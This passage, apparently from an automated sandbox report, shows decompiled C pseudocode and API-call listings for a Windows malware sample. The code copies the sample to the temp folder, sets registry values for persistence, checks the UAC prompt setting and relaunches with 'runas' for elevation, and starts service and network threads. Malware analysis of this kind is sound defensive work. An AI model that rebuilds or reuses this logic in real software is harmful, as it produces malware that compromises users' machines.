                                                                                														__eflags = _v372 - 0x22;
                                                                                														if(_v372 != 0x22) {
                                                                                															lstrcatA( &_v1272, "\"");
                                                                                														}
                                                                                														lstrcatA( &_v1272,  &_v372);
                                                                                														__eflags = _v372 - 0x22;
                                                                                														if(_v372 != 0x22) {
                                                                                															lstrcatA( &_v1272, "\"");
                                                                                														}
                                                                                														_v36 = 1;
                                                                                													}
                                                                                												}
                                                                                											}
                                                                                										}
                                                                                										__eflags = _v32;
                                                                                										if(_v32 != 0) {
                                                                                											__eflags = _v28;
                                                                                											if(_v28 != 0) {
                                                                                												wsprintfA( &_v372, "%X%08X", _v28, _v32);
                                                                                												lstrcatA( &_v1272, E00402544(_t459, 0x410a28, 4, 0xe4, 0xc8));
                                                                                												E0040EE2A(_t438, _t459, 0, _t454);
                                                                                												_t469 = _t469 + 0x30;
                                                                                												lstrcatA( &_v1272,  &_v372);
                                                                                											}
                                                                                										}
                                                                                										_t344 = CreateProcessA(0,  &_v1272, 0, 0, 0, 0x8000000, 0, 0,  &_v772,  &_v64);
                                                                                										__eflags = _t344;
                                                                                										if(_t344 == 0) {
                                                                                											DeleteFileA( &_v672);
                                                                                											_v36 = 0;
                                                                                										}
                                                                                										__eflags = _v16 - 1;
                                                                                										if(_v16 == 1) {
                                                                                											__eflags = _v20;
                                                                                											if(_v20 == 0) {
                                                                                												E004096FF(_t438);
                                                                                											}
                                                                                										}
                                                                                										goto L82;
                                                                                									}
                                                                                									__eflags = _v112;
                                                                                									if(_v112 != 0) {
                                                                                										goto L61;
                                                                                									}
                                                                                									goto L60;
                                                                                								}
                                                                                								_t379 = GetTempPathA(0x1f4,  &_v1272);
                                                                                								_t494 = _t379;
                                                                                								if(_t379 == 0) {
                                                                                									goto L55;
                                                                                								}
                                                                                								_t383 = E004099D2(_t449, _t494,  &_v1272,  &_v672,  &_v704, _v8, _v12); // executed
                                                                                								_t467 = _t467 + 0x14;
                                                                                								if(_t383 == 0) {
                                                                                									goto L55;
                                                                                								}
                                                                                								_v80 = 0;
                                                                                								if(_v16 < 3 || _v372 == 0) {
                                                                                									_push(0);
                                                                                									_push( &_v80);
                                                                                									_push(E00406DC2(_t438) ^ 0x61616161);
                                                                                									E0040F133();
                                                                                									_t474 = _t467 + 0xc;
                                                                                									lstrcpyA( &_v372, E00406CC9(_t438));
                                                                                									lstrcatA( &_v372,  &_v80);
                                                                                									lstrcatA( &_v372,  &E0041070C);
                                                                                									_t396 = 0;
                                                                                									__eflags = 0;
                                                                                									goto L43;
                                                                                								} else {
                                                                                									_t410 =  &_v372;
                                                                                									_t450 = _t410 + 1;
                                                                                									do {
                                                                                										_t441 =  *_t410;
                                                                                										_t410 = _t410 + 1;
                                                                                									} while (_t441 != 0);
                                                                                									_t411 = _t410 - _t450;
                                                                                									if(_t411 > 0 &&  *((char*)(_t464 + _t411 - 0x171)) == 0x5c) {
                                                                                										_t411 = _t411 - 1;
                                                                                									}
                                                                                									_t451 = _t411;
                                                                                									if(_t411 <= 0) {
                                                                                										L41:
                                                                                										_t449 = _t451 - _t411;
                                                                                										_a12 = _t451 - _t411;
                                                                                										E0040EE08( &_v80, _t464 + _t411 - 0x170, _t451 - _t411);
                                                                                										 *((char*)(_t464 + _a12 - 0x4c)) = 0;
                                                                                										_t474 = _t467 + 0xc;
                                                                                										_t396 = 1;
                                                                                										L43:
                                                                                										if(_v44 == 0 || _v48 < 0x50) {
                                                                                											_t438 = 1;
                                                                                											__eflags = 1;
                                                                                										} else {
                                                                                											_t438 = 0;
                                                                                										}
                                                                                										_push(_t438);
                                                                                										_push(_t396);
                                                                                										_push( &_v372);
                                                                                										_push( &_v80);
                                                                                										_push( &_v672);
                                                                                										_push( &_v704);
                                                                                										_t401 = E00409326(_t438, _t449);
                                                                                										_t467 = _t474 + 0x18;
                                                                                										if(_t401 == 0) {
                                                                                											_t402 =  *0x41217c; // 0x0
                                                                                											_v32 = _t402;
                                                                                											_t403 =  *0x412180; // 0x0
                                                                                											goto L54;
                                                                                										} else {
                                                                                											if(GetFileAttributesExA( &_v672, 0,  &(_v772.dwXCountChars)) != 0) {
                                                                                												_t403 = 0x61040108;
                                                                                												 *0x412180 = 0x61040108;
                                                                                												 *0x41217c = 0;
                                                                                												_v32 = 0;
                                                                                												L54:
                                                                                												_v28 = _t403;
                                                                                												DeleteFileA( &_v672);
                                                                                												goto L55;
                                                                                											}
                                                                                											_t459 = 1;
                                                                                											if(_v16 == 1) {
                                                                                												E004096FF(_t438);
                                                                                											}
                                                                                											_v36 = _t459;
                                                                                											goto L83;
                                                                                										}
                                                                                									} else {
                                                                                										_t442 =  &_v372;
                                                                                										while( *((char*)(_t442 + _t411 - 1)) != 0x5c) {
                                                                                											_t411 = _t411 - 1;
                                                                                											if(_t411 > 0) {
                                                                                												continue;
                                                                                											}
                                                                                											goto L41;
                                                                                										}
                                                                                										goto L41;
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					_t417 = _v8;
                                                                                					_t454 = _t417 + 3;
                                                                                					_v372 = 0;
                                                                                					if( *((char*)(_t417 + 3)) != 0x22) {
                                                                                						_t418 = E0040ED03(_t454, 0x20);
                                                                                						_pop(_t438);
                                                                                						__eflags = _t418;
                                                                                						if(_t418 == 0) {
                                                                                							_t418 =  &(_a12[lstrlenA(_a12)]);
                                                                                							__eflags = _t418;
                                                                                						}
                                                                                						_t459 = _t418 - _v8;
                                                                                						__eflags = _t459;
                                                                                						E0040EE08( &_v372, _t454, _t459 - 3);
                                                                                						 *((char*)(_t464 + _t459 - 0x173)) = 0;
                                                                                						L13:
                                                                                						_t467 = _t467 + 0xc;
                                                                                						L14:
                                                                                						if(_v372 != 0 && _v672 != 0) {
                                                                                							_t424 = E0040675C( &_v672,  &_v12, 0);
                                                                                							_t467 = _t467 + 0xc;
                                                                                							if(_t424 != 0 && _v12 != 0) {
                                                                                								_t426 = E00406A60(_t449,  &_v372, _t424, _v12);
                                                                                								_t467 = _t467 + 0xc;
                                                                                								_v12 = _t426;
                                                                                							}
                                                                                						}
                                                                                						goto L19;
                                                                                					}
                                                                                					_t454 = _t417 + 4;
                                                                                					_t428 = E0040ED03(_t417 + 4, 0x22);
                                                                                					_pop(_t438);
                                                                                					if(_t428 == 0) {
                                                                                						goto L14;
                                                                                					} else {
                                                                                						_t459 = _t428 - _v8;
                                                                                						E0040EE08( &_v372, _t454, _t459 - 4);
                                                                                						 *((char*)(_t464 + _t459 - 0x174)) = 0;
                                                                                						goto L13;
                                                                                					}
                                                                                				}
                                                                                			}
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a49f
                                                                                0x0040a4a7
                                                                                0x0040a4ac
                                                                                0x0040a4be
                                                                                0x0040a4c3
                                                                                0x00000000
                                                                                0x0040a4c3
                                                                                0x0040a4ae
                                                                                0x0040a4ae
                                                                                0x0040a4b3
                                                                                0x0040a4b5
                                                                                0x0040a4b9
                                                                                0x0040a4b9
                                                                                0x00000000
                                                                                0x0040a4b5
                                                                                0x0040a497
                                                                                0x0040a3da
                                                                                0x0040a406
                                                                                0x0040a407
                                                                                0x0040a409
                                                                                0x0040a40b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a3e8
                                                                                0x0040a3eb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a3ed
                                                                                0x0040a3f3
                                                                                0x0040a3f6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a3f8
                                                                                0x0040a3f8
                                                                                0x0040a3f8
                                                                                0x0040a400
                                                                                0x0040a400
                                                                                0x0040a414
                                                                                0x0040a419
                                                                                0x00000000
                                                                                0x00409aa3
                                                                                0x00409ab0
                                                                                0x00409ac2
                                                                                0x00409ac4
                                                                                0x00409ac4
                                                                                0x00409ad1
                                                                                0x00409ae1
                                                                                0x00409aef
                                                                                0x00409af4
                                                                                0x00409af9
                                                                                0x00409afb
                                                                                0x00409afb
                                                                                0x00409af9
                                                                                0x00409afd
                                                                                0x00409b14
                                                                                0x00409b1a
                                                                                0x00409b26
                                                                                0x00409b2b
                                                                                0x00409b33
                                                                                0x00409b36
                                                                                0x00409b3b
                                                                                0x00409b41
                                                                                0x00409c26
                                                                                0x00409c2b
                                                                                0x00409c2e
                                                                                0x00409c33
                                                                                0x0040a1de
                                                                                0x0040a1e4
                                                                                0x0040a1fd
                                                                                0x0040a211
                                                                                0x0040a214
                                                                                0x0040a219
                                                                                0x0040a21c
                                                                                0x0040a21f
                                                                                0x0040a2e2
                                                                                0x0040a305
                                                                                0x0040a308
                                                                                0x0040a30d
                                                                                0x0040a310
                                                                                0x0040a313
                                                                                0x0040a35a
                                                                                0x0040a35a
                                                                                0x0040a35f
                                                                                0x0040a361
                                                                                0x0040a3c2
                                                                                0x00409c05
                                                                                0x00409c06
                                                                                0x00409c06
                                                                                0x0040a363
                                                                                0x0040a369
                                                                                0x0040a397
                                                                                0x0040a397
                                                                                0x0040a39d
                                                                                0x0040a3a3
                                                                                0x0040a3aa
                                                                                0x0040a3b1
                                                                                0x0040a3b4
                                                                                0x0040a3b7
                                                                                0x00000000
                                                                                0x0040a3b7
                                                                                0x0040a36b
                                                                                0x0040a371
                                                                                0x0040a374
                                                                                0x0040a374
                                                                                0x0040a376
                                                                                0x0040a377
                                                                                0x0040a377
                                                                                0x0040a37d
                                                                                0x0040a380
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a38e
                                                                                0x0040a394
                                                                                0x00000000
                                                                                0x0040a394
                                                                                0x0040a318
                                                                                0x0040a31e
                                                                                0x0040a324
                                                                                0x0040a325
                                                                                0x0040a327
                                                                                0x0040a339
                                                                                0x0040a33b
                                                                                0x0040a33d
                                                                                0x0040a340
                                                                                0x0040a344
                                                                                0x0040a344
                                                                                0x0040a34c
                                                                                0x0040a351
                                                                                0x0040a354
                                                                                0x00000000
                                                                                0x0040a354
                                                                                0x0040a329
                                                                                0x0040a32b
                                                                                0x0040a32e
                                                                                0x0040a32e
                                                                                0x0040a330
                                                                                0x0040a331
                                                                                0x0040a331
                                                                                0x0040a337
                                                                                0x0040a337
                                                                                0x00000000
                                                                                0x0040a337
                                                                                0x0040a228
                                                                                0x0040a22b
                                                                                0x0040a231
                                                                                0x0040a234
                                                                                0x0040a237
                                                                                0x0040a27a
                                                                                0x0040a280
                                                                                0x0040a281
                                                                                0x0040a283
                                                                                0x0040a28e
                                                                                0x0040a28e
                                                                                0x0040a28e
                                                                                0x0040a291
                                                                                0x0040a294
                                                                                0x0040a297
                                                                                0x0040a2a5
                                                                                0x0040a2ad
                                                                                0x0040a2b4
                                                                                0x0040a2b4
                                                                                0x0040a2b7
                                                                                0x0040a2b7
                                                                                0x0040a2bd
                                                                                0x0040a2d0
                                                                                0x0040a2d5
                                                                                0x0040a2d5
                                                                                0x0040a2d8
                                                                                0x00000000
                                                                                0x0040a2d8
                                                                                0x0040a242
                                                                                0x0040a245
                                                                                0x0040a24b
                                                                                0x0040a24c
                                                                                0x0040a24e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a253
                                                                                0x0040a264
                                                                                0x0040a26c
                                                                                0x00000000
                                                                                0x0040a26c
                                                                                0x00409c39
                                                                                0x00409c3f
                                                                                0x0040a167
                                                                                0x0040a183
                                                                                0x0040a190
                                                                                0x0040a196
                                                                                0x0040a198
                                                                                0x0040a198
                                                                                0x0040a1a2
                                                                                0x0040a1b3
                                                                                0x0040a1b6
                                                                                0x0040a1bc
                                                                                0x0040a1bf
                                                                                0x0040a1c7
                                                                                0x0040a1cc
                                                                                0x0040a1cc
                                                                                0x0040a1bf
                                                                                0x0040a1a2
                                                                                0x00000000
                                                                                0x00409c54
                                                                                0x00409c56
                                                                                0x00409c5b
                                                                                0x00409c62
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00409c74
                                                                                0x00409c79
                                                                                0x00409c7c
                                                                                0x00409c81
                                                                                0x00000000
                                                                                0x00409c90
                                                                                0x00409c94
                                                                                0x00409c97
                                                                                0x00409c9a
                                                                                0x00409e3e
                                                                                0x00409e3e
                                                                                0x00409e42
                                                                                0x0040a155
                                                                                0x0040a158
                                                                                0x0040a15d
                                                                                0x0040a161
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a161
                                                                                0x00409e66
                                                                                0x00409e6b
                                                                                0x00409e75
                                                                                0x00409e77
                                                                                0x0040a14a
                                                                                0x0040a14d
                                                                                0x0040a152
                                                                                0x00000000
                                                                                0x0040a152
                                                                                0x00409e98
                                                                                0x00409e9d
                                                                                0x00409ea0
                                                                                0x00409ea2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00409eab
                                                                                0x00409eb0
                                                                                0x00409ec1
                                                                                0x00409ec8
                                                                                0x00409ed5
                                                                                0x00409edb
                                                                                0x00409ee3
                                                                                0x00409ee4
                                                                                0x00409ee8
                                                                                0x00409eeb
                                                                                0x00409ef2
                                                                                0x00409ef9
                                                                                0x00409efc
                                                                                0x00409efd
                                                                                0x00409f03
                                                                                0x00409f03
                                                                                0x00409f08
                                                                                0x00409f09
                                                                                0x00409f0e
                                                                                0x00409f11
                                                                                0x00409f2d
                                                                                0x00409f32
                                                                                0x00409f3b
                                                                                0x00409f41
                                                                                0x00409f44
                                                                                0x00409f46
                                                                                0x00409f4b
                                                                                0x00409f4b
                                                                                0x00409f67
                                                                                0x00409f6a
                                                                                0x00409f6a
                                                                                0x00409f73
                                                                                0x00409f82
                                                                                0x00409f8e
                                                                                0x00409f98
                                                                                0x00409f9d
                                                                                0x00409fb4
                                                                                0x00409fba
                                                                                0x00409fbc
                                                                                0x00409fc2
                                                                                0x00409fc9
                                                                                0x00409fcf
                                                                                0x00409fd2
                                                                                0x00409fd4
                                                                                0x00409fda
                                                                                0x00409fda
                                                                                0x00409fdd
                                                                                0x00409fe1
                                                                                0x00409fe7
                                                                                0x00409feb
                                                                                0x00409ff1
                                                                                0x00409ff4
                                                                                0x00409ff8
                                                                                0x00409ffb
                                                                                0x00409ffe
                                                                                0x0040a004
                                                                                0x0040a007
                                                                                0x0040a010
                                                                                0x0040a025
                                                                                0x0040a038
                                                                                0x0040a041
                                                                                0x0040a046
                                                                                0x0040a049
                                                                                0x0040a050
                                                                                APIs
                                                                                • SetErrorMode.KERNELBASE(00000003), ref: 00409A7F
                                                                                • SetErrorMode.KERNELBASE(00000003), ref: 00409A83
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00406511), ref: 00409A8A
                                                                                  • Part of subcall function 0040EC54: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040EC5E
                                                                                  • Part of subcall function 0040EC54: GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0040EC72
                                                                                  • Part of subcall function 0040EC54: GetTickCount.KERNEL32 ref: 0040EC78
                                                                                • GetModuleHandleA.KERNEL32(00000000,?,0000012C), ref: 00409AB3
                                                                                • GetModuleFileNameA.KERNEL32(00000000), ref: 00409ABA
                                                                                • GetCommandLineA.KERNEL32 ref: 00409AFD
                                                                                • lstrlenA.KERNEL32(?), ref: 00409B99
                                                                                • ExitProcess.KERNEL32 ref: 00409C06
                                                                                • GetTempPathA.KERNEL32(000001F4,?), ref: 00409CAC
                                                                                • lstrcpyA.KERNEL32(?,00000000), ref: 00409D7A
                                                                                • lstrcatA.KERNEL32(?,?), ref: 00409D8B
                                                                                • lstrcatA.KERNEL32(?,0041070C), ref: 00409D9D
                                                                                • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 00409DED
                                                                                • DeleteFileA.KERNEL32(00000022), ref: 00409E38
                                                                                • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,000001F4), ref: 00409E6F
                                                                                • lstrcpyA.KERNEL32(?,00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 00409EC8
                                                                                • lstrlenA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 00409ED5
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000103,?), ref: 00409F3B
                                                                                • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000022,?,?,?,00000000,00000103,?), ref: 00409F5E
                                                                                • RegCloseKey.ADVAPI32(?,?,?,00000000,00000103,?), ref: 00409F6A
                                                                                • GetModuleHandleA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103), ref: 00409FAD
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 00409FB4
                                                                                • GetDriveTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 00409FFE
                                                                                • lstrcatA.KERNEL32(00000022,00000000), ref: 0040A038
                                                                                • lstrcatA.KERNEL32(00000022,00410A34), ref: 0040A05E
                                                                                • lstrcatA.KERNEL32(00000022,00000022), ref: 0040A072
                                                                                • lstrcatA.KERNEL32(00000022,00410A34), ref: 0040A08D
                                                                                • wsprintfA.USER32 ref: 0040A0B6
                                                                                • lstrcatA.KERNEL32(00000022,00000000), ref: 0040A0DE
                                                                                • lstrcatA.KERNEL32(00000022,?), ref: 0040A0FD
                                                                                • CreateProcessA.KERNEL32(00000000,00000022,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 0040A120
                                                                                • DeleteFileA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 0040A131
                                                                                • GetModuleHandleA.KERNEL32(00000000,00000022,0000012C), ref: 0040A174
                                                                                • GetModuleFileNameA.KERNEL32(00000000), ref: 0040A17B
                                                                                • GetDriveTypeA.KERNEL32(00000022), ref: 0040A1B6
                                                                                • GetCommandLineA.KERNEL32 ref: 0040A1E5
                                                                                  • Part of subcall function 004099D2: lstrcpyA.KERNEL32(?,?,00000100,PromptOnSecureDesktop,00000000,?,00409E9D,?,00000022,?,?,?,?,?,?,?), ref: 004099DF
                                                                                  • Part of subcall function 004099D2: lstrcatA.KERNEL32(00000022,00000000,?,?,00409E9D,?,00000022,?,?,?,?,?,?,?,000001F4), ref: 00409A3C
                                                                                  • Part of subcall function 004099D2: lstrcatA.KERNEL32(?,00000022,?,?,?,?,?,00409E9D,?,00000022,?,?,?), ref: 00409A52
                                                                                • lstrlenA.KERNEL32(?), ref: 0040A288
                                                                                • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040A3B7
                                                                                • GetLastError.KERNEL32 ref: 0040A3ED
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040A400
                                                                                • DeleteFileA.KERNEL32(004133D8), ref: 0040A407
                                                                                • CreateThread.KERNEL32 ref: 0040A42C
                                                                                • WSAStartup.WS2_32(00001010,?), ref: 0040A43A
                                                                                • CreateThread.KERNEL32 ref: 0040A469
                                                                                • Sleep.KERNEL32(00000BB8), ref: 0040A48A
                                                                                • GetTickCount.KERNEL32 ref: 0040A49F
                                                                                • GetTickCount.KERNEL32 ref: 0040A4B7
                                                                                • Sleep.KERNEL32(00001A90), ref: 0040A4C3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$File$Module$CountCreateDeleteErrorHandleNameSleepTicklstrcpylstrlen$CommandDriveLineModeProcessThreadTimeType$AttributesCloseCtrlDispatcherEnvironmentExceptionExitFilterInformationLastOpenPathServiceStartStartupSystemTempUnhandledValueVariableVolumewsprintf
                                                                                • String ID: "$"$"$%X%08X$D$P$PromptOnSecureDesktop$\
                                                                                • API String ID: 2089075347-2824936573
                                                                                • Opcode ID: 18b4ae6482f41c14cc79419ed77fb5de14a5e8e06cea60f144981a1212c6d878
                                                                                • Instruction ID: 2e8e4d28fd33f050895bc00b790e6664de298002562c0b6b0b892c26365fcd94
                                                                                • Opcode Fuzzy Hash: 18b4ae6482f41c14cc79419ed77fb5de14a5e8e06cea60f144981a1212c6d878
                                                                                • Instruction Fuzzy Hash: E95291B1D40259BBDB11DBA1CC49EEF7BBCAB04304F1444BBF509F6182D6788E948B69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph
                                                                                C-Code - Quality: 77%
                                                                                			E00409326(void* __ecx, void* __edx) {
                                                                                				void* __ebx;
                                                                                				char _t88;
                                                                                				void* _t89;
                                                                                				int _t92;
                                                                                				void* _t96;
                                                                                				signed int _t97;
                                                                                				signed int _t100;
                                                                                				signed int _t103;
                                                                                				char* _t106;
                                                                                				long _t107;
                                                                                				char* _t111;
                                                                                				signed int _t112;
                                                                                				char* _t116;
                                                                                				signed int _t117;
                                                                                				int _t119;
                                                                                				void* _t146;
                                                                                				signed int _t155;
                                                                                				int _t161;
                                                                                				signed int _t165;
                                                                                				signed int _t167;
                                                                                				void* _t168;
                                                                                				void* _t170;
                                                                                				void* _t172;
                                                                                				void* _t173;
                                                                                				void* _t175;
                                                                                				void* _t176;
                                                                                
                                                                                				_t146 = __ecx;
                                                                                				_t168 = _t170 - 0x60;
                                                                                				E00401910(0x19bc);
                                                                                				 *(_t168 - 0x58) = 0x9c;
                                                                                				if(GetVersionExA(_t168 - 0x58) == 0) {
                                                                                					 *(_t168 - 0x4c) =  *(_t168 - 0x4c) & 0x00000000;
                                                                                					_t9 = _t168 + 0x58;
                                                                                					 *_t9 =  *(_t168 + 0x58) & 0x00000000;
                                                                                					__eflags =  *_t9;
                                                                                				} else {
                                                                                					 *(_t168 + 0x58) = ( *(_t168 - 0x54) << 4) +  *((intOrPtr*)(_t168 - 0x50));
                                                                                				}
                                                                                				_t88 = GetModuleFileNameA(GetModuleHandleA(0), _t168 - 0x15c, 0x104);
                                                                                				if(_t88 == 0) {
                                                                                					 *(_t168 - 0x15c) = _t88;
                                                                                				}
                                                                                				_push( *((intOrPtr*)(_t168 + 0x70)));
                                                                                				_t89 = _t168 - 0x15c;
                                                                                				if( *(_t168 + 0x78) == 0) {
                                                                                					_push( *((intOrPtr*)(_t168 + 0x70)));
                                                                                					_push(_t89);
                                                                                					_push( *((intOrPtr*)(_t168 + 0x68)));
                                                                                					_push( *((intOrPtr*)(_t168 + 0x74)));
                                                                                					_push( *((intOrPtr*)(_t168 + 0x70)));
                                                                                					_push( *((intOrPtr*)(_t168 + 0x74)));
                                                                                					_push( *((intOrPtr*)(_t168 + 0x6c)));
                                                                                					_push( *((intOrPtr*)(_t168 + 0x74)));
                                                                                					_t92 = wsprintfA(_t168 - 0x95c, E00402544(0x4122f8,  &E00410918, 0xbd, 0xe4, 0xc8));
                                                                                					_t172 = _t170 + 0x40;
                                                                                				} else {
                                                                                					_push(_t89);
                                                                                					_push( *((intOrPtr*)(_t168 + 0x68)));
                                                                                					_push( *((intOrPtr*)(_t168 + 0x74)));
                                                                                					_push( *((intOrPtr*)(_t168 + 0x70)));
                                                                                					_push( *((intOrPtr*)(_t168 + 0x74)));
                                                                                					_push( *((intOrPtr*)(_t168 + 0x6c)));
                                                                                					_t92 = wsprintfA(_t168 - 0x95c, E00402544(0x4122f8, 0x4109d8, 0x4d, 0xe4, 0xc8));
                                                                                					_t172 = _t170 + 0x38;
                                                                                				}
                                                                                				 *(_t168 + 0x78) = _t92;
                                                                                				E0040EE2A(_t146, 0x4122f8, 0, 0x100);
                                                                                				_t173 = _t172 + 0xc;
                                                                                				if( *(_t168 + 0x58) >= 0x60 &&  *((intOrPtr*)(_t168 + 0x7c)) != 0) {
                                                                                					E0040EF00(_t168 - 0x15c, E00406CC9(_t146));
                                                                                					E0040EF1E(_t168 - 0x15c, E00402544(0x4122f8,  &E0041090C, 0xc, 0xe4, 0xc8));
                                                                                					_push(_t168 - 0x15c);
                                                                                					wsprintfA(_t168 +  *(_t168 + 0x78) - 0x95c, E00402544(0x4122f8,  &E00410888, 0x82, 0xe4, 0xc8));
                                                                                					E0040EE2A(_t146, 0x4122f8, 0, 0x100);
                                                                                					_t173 = _t173 + 0x50;
                                                                                				}
                                                                                				 *(_t168 + 0x78) =  *(_t168 + 0x78) & 0x00000000;
                                                                                				 *(_t168 + 0x5c) = E00406EDD();
                                                                                				if( *(_t168 + 0x58) < 0x60) {
                                                                                					_t165 =  *(_t168 + 0x78);
                                                                                					_t161 = 0;
                                                                                					__eflags = 0;
                                                                                					L33:
                                                                                					__eflags =  *(_t168 + 0x5c) - _t161;
                                                                                					if( *(_t168 + 0x5c) == _t161) {
                                                                                						L38:
                                                                                						_push(_t168 - 0x95c);
                                                                                						_push(_t161); // executed
                                                                                						L39:
                                                                                						_t96 = E004091EB(); // executed
                                                                                						__eflags =  *0x412180 - _t161; // 0x0
                                                                                						if(__eflags != 0) {
                                                                                							 *0x412180 =  *0x412180 | _t165;
                                                                                							__eflags =  *0x412180;
                                                                                						}
                                                                                						__eflags = _t96 - 0x2a;
                                                                                						_t81 = _t96 == 0x2a;
                                                                                						__eflags = _t81;
                                                                                						_t97 = 0 | _t81;
                                                                                						L42:
                                                                                						return _t97;
                                                                                					}
                                                                                					_t100 = E00401820(_t168 + 0x54, _t168 + 0x78);
                                                                                					__eflags = _t100;
                                                                                					if(_t100 != 0) {
                                                                                						_push(_t168 - 0x95c);
                                                                                						_push("runas");
                                                                                						goto L39;
                                                                                					}
                                                                                					_t103 =  *(_t168 + 0x78) | 0x61040000;
                                                                                					__eflags = _t103;
                                                                                					 *0x412180 = _t103;
                                                                                					 *0x41217c =  *(_t168 + 0x54);
                                                                                					if(_t103 != 0) {
                                                                                						 *0x412180 = _t103 | _t165;
                                                                                					}
                                                                                					L31:
                                                                                					_t97 = 0;
                                                                                					goto L42;
                                                                                				}
                                                                                				 *(_t168 + 0x4c) = 4;
                                                                                				 *(_t168 + 0x44) = 5;
                                                                                				 *(_t168 + 0x48) = 1;
                                                                                				_t106 = E00402544(0x4122f8,  &E0041084C, 0x3a, 0xe4, 0xc8);
                                                                                				_t175 = _t173 + 0x14;
                                                                                				_t107 = RegOpenKeyExA(0x80000002, _t106, 0, 0x101, _t168 + 0x50); // executed
                                                                                				if(_t107 == 0) {
                                                                                					_t111 = E00402544(0x4122f8, 0x410830, 0x1b, 0xe4, 0xc8);
                                                                                					_t176 = _t175 + 0x14;
                                                                                					_t112 = RegQueryValueExA( *(_t168 + 0x50), _t111, 0, _t168 + 0x54, _t168 + 0x44, _t168 + 0x4c); // executed
                                                                                					__eflags = _t112;
                                                                                					if(_t112 == 0) {
                                                                                						_t116 = E00402544(0x4122f8, 0x410818, 0x16, 0xe4, 0xc8);
                                                                                						_t176 = _t176 + 0x14;
                                                                                						_t117 = RegQueryValueExA( *(_t168 + 0x50), _t116, 0, _t168 + 0x54, _t168 + 0x48, _t168 + 0x4c); // executed
                                                                                						__eflags = _t117;
                                                                                						if(_t117 != 0) {
                                                                                							 *(_t168 + 0x78) = 0x3000;
                                                                                						}
                                                                                					} else {
                                                                                						 *(_t168 + 0x78) = 0x2000;
                                                                                					}
                                                                                					RegCloseKey( *(_t168 + 0x50));
                                                                                					_t165 =  *(_t168 + 0x78);
                                                                                				} else {
                                                                                					_t165 = 0x1000;
                                                                                				}
                                                                                				_t161 = 0;
                                                                                				if( *(_t168 + 0x44) != 0 ||  *(_t168 + 0x48) != 0) {
                                                                                					if( *(_t168 + 0x5c) <= _t161) {
                                                                                						goto L38;
                                                                                					}
                                                                                					_t119 =  *(_t168 - 0x4c);
                                                                                					if( *(_t168 + 0x58) < 0x61 || _t119 < 0x1db0) {
                                                                                						 *0x41217c = _t119;
                                                                                						_t167 = _t165 | 0x61040106;
                                                                                						__eflags = _t167;
                                                                                						goto L30;
                                                                                					} else {
                                                                                						if(E0040F0E4(_t168 - 0x95c, _t168 - 0x195c, 0x800) == 0) {
                                                                                							 *0x41217c = _t161;
                                                                                							_t167 = _t165 | 0x61040107;
                                                                                							L30:
                                                                                							 *0x412180 = _t167;
                                                                                							goto L31;
                                                                                						}
                                                                                						_t97 = E004018E0(0xc8, _t168 - 0x195c, _t168 + 0x5c, _t168 + 0x78);
                                                                                						if(_t97 == _t161) {
                                                                                							_t155 =  *(_t168 + 0x78) | 0x61040000;
                                                                                							 *0x412180 = _t155;
                                                                                							 *0x41217c =  *(_t168 + 0x5c);
                                                                                							if(_t155 != 0) {
                                                                                								 *0x412180 = _t155 | _t165;
                                                                                							}
                                                                                						}
                                                                                						goto L42;
                                                                                					}
                                                                                				} else {
                                                                                					goto L33;
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                • GetVersionExA.KERNEL32(?,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 00409340
                                                                                • GetModuleHandleA.KERNEL32(00000000,?,00000104,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 0040936E
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 00409375
                                                                                • wsprintfA.USER32 ref: 004093CE
                                                                                • wsprintfA.USER32 ref: 0040940C
                                                                                • wsprintfA.USER32 ref: 0040948D
                                                                                • RegOpenKeyExA.KERNELBASE(80000002,00000000,?,?,00000000,00000101,?), ref: 004094F1
                                                                                • RegQueryValueExA.KERNELBASE(?,00000000,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00409526
                                                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00409571
                                                                                Strings
                                                                                Memory Dump Source
